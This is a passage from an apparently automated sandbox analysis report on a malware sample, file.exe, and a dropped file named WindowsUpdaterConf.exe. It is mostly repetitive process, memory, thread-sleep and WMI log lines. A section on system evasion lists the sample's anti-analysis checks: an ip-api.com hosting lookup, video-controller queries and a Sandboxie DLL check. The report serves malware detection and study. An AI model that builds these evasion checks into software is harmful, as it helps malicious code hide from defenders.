                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Check if machine is in data center or colocation facility
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: file.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLS4WEIXQYFKWGVCHF6KZIFHNPQFOADF3TYS2MMYC3NU9B3RRZ55N7OPIXOVSWVSLITU9AM9ZC1QY9TWD1VXTOYTDAQSFLMHAW3OWS2TFXPA1ZVBMAZZSXSQ3MGBQL1KNPWNPZOIG9EAFOKON2D309JGGENF1NBT0HK6RE1X4RZ8YQYVSFQQOITPRKTMUFHCM3JZCGXGQIZIAFFO90ANB7FEZVZDYJIQDPRZ0PNGTPSC3SSUBGLRQWYJ3MFSXJFXUOJ82U3QPOQRD26GXO5CO5BAM8NIDTY18EJFUWSEE5VIGLEZNK9RLQB6TYVJ322BX597G9WACF9LKO4UDCCJMKNK6IHADZDWJ65CLRC919PXKYV1QGLZCOM4NHU30JH5WOPY31ANPWQG9EOZGRY5VXATTRJCVAIANDOGMUS0FOO8NVYM5FO2QJI07BX9TFIMMJREJXX5I9HQZZQNULTQDEBAOAAIOWZQNEP8YPQZ5T6AK9XBADNTSINZUB0UAUJPGTLBO7HPLVPYOWWYP3VR9GNKRCL0UCYNWTD38GUY01BGKUZASPBTNMDAFXS5H6YUSN94VUSHJH2MWJ5U8UWFEGVWBCIJBIER0708KXEFEVAHJQMYERBGV7AN1RBVU3XEHSYNTHQEE9WQQHUYZSJQVRNRZ8SXLGKK4TOVZWEUCRFLLVLSECE96BRCPXJIWGCZDH2LLQMJPCSVZYD0WRINFO
                            Source: file.exe, 0000000E.00000002.2228777015.0000000001835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLD
                            Source: file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                            Source: file.exe, 00000000.00000002.1754386213.0000000003241000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.2241827212.0000000003442000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000016.00000002.2211795636.0000000002701000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 0000001B.00000002.2323696977.0000000002982000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 0000001E.00000002.2283079666.0000000003131000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 00000021.00000002.2355414585.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 00000025.00000002.3066688443.0000000003362000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdaterConf.exe, 00000028.00000002.3653291877.0000000003182000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $FQ>112#127#122#115#119#117#98#127#96#127#98#111#97#119#98#117#126`,FQ SBIEDLL.DLLOLHELPERENTYZER
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 3240000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 5240000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 11C0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 4BD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 32F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 3430000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 5430000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: D70000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 2700000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 4700000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: EE0000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 2970000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 4970000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 1720000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 3130000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 5130000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 1900000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 38B0000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 2050000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 1990000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 3350000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 5350000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 1800000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 3170000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 5170000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 3000000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 3030000 memory reserve | memory write watch
                            Source: C:\Users\user\WindowsUpdaterConf.exeMemory allocated: 5030000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599875Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599765Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599656Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599546Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599421Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599312Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599202Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599093Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598984Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598875Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598765Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598656Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598546Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598437Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598324Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598218Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598109Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597999Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597813Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597531Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597406Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 6473Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 3337Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5899Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3871Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7101Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2525Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7217
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 989
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8207
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1297
                            Source: C:\Users\user\Desktop\file.exe TID: 6740Thread sleep count: 238 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 6660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -599875s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -599765s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -599656s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -599546s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -599421s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -599312s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -599202s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -599093s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -598984s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -598875s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -598765s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -598656s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -598546s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -598437s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -598324s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -598218s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -598109s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -597999s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -597813s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -597531s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 2132Thread sleep time: -597406s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2132Thread sleep count: 7101 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1136Thread sleep count: 2525 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3412Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2336Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\file.exe TID: 1076Thread sleep count: 197 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep count: 8207 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep count: 1297 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3736Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\file.exe TID: 6372Thread sleep count: 214 > 30
                            Source: C:\Users\user\WindowsUpdaterConf.exe TID: 2208Thread sleep count: 213 > 30
                            Source: C:\Users\user\WindowsUpdaterConf.exe TID: 6328Thread sleep count: 229 > 30
                            Source: C:\Users\user\WindowsUpdaterConf.exe TID: 2356Thread sleep count: 196 > 30
                            Source: C:\Users\user\WindowsUpdaterConf.exe TID: 4624Thread sleep count: 142 > 30
                            Source: C:\Users\user\WindowsUpdaterConf.exe TID: 6392Thread sleep count: 172 > 30
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\WindowsUpdaterConf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\WindowsUpdaterConf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\WindowsUpdaterConf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\WindowsUpdaterConf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\WindowsUpdaterConf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\file.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Roaming\file.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599875Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599765Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599656Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599546Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599421Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599312Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599202Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599093Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598984Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598875Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598765Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598656Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598546Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598437Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598324Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598218Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598109Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597999Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597813Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597531Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597406Jump to behavior
